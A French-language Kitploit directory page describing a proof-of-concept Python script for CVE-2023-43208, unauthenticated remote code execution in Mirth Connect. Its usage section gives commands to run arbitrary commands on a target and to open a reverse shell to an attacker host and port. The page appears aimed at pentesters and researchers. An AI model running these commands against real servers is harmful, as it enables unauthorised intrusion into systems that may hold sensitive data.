Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-43208-PoC — Script Python de preuve de concept démontrant CVE‑2023‑43208 dans Mirth Connect, permettant des vérifications de version et l'exécution de commandes sur des instances vulnérables. | Kitploit
Outils/GitHubGitHub/criz117/cve-2023-43208-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubcriz117/cve-2023-43208-poc

CVE-2023-43208-PoC

Script Python de preuve de concept démontrant CVE‑2023‑43208 dans Mirth Connect, permettant des vérifications de version et l'exécution de commandes sur des instances vulnérables.

Voir le dépôt
1il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-43208 - Mirth Connect RCE non authentifiée

Prérequis

  • Python 3.11 ou supérieur (testé sur 3.11, 3.12, 3.13)

Installation

root@kitploit:~
# Create a clean virtual environment
python3 -m venv .venv
source .venv/bin/activate

# Install pinned dependencies
pip install -r requirements.txt

Utilisation

root@kitploit:~
# Check version only
python3 CVE-2023-43208.py -u https://TARGET/ --check

# Execute a single command
python3 CVE-2023-43208.py -u https://TARGET/ -c "whoami"

# Reverse shell (start nc listener first)
python3 CVE-2023-43208.py -u https://TARGET/ -l LHOST -p LPORT

Remarques

  • Une réponse 500 du serveur est normale et attendue — la commande s'exécute quand même
  • Affecte Mirth Connect < 4.4.1
  • Avertissement

    Cette preuve de concept est fournie à des fins de recherche et d'éducation uniquement. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par ce code.

    Télécharger l’outil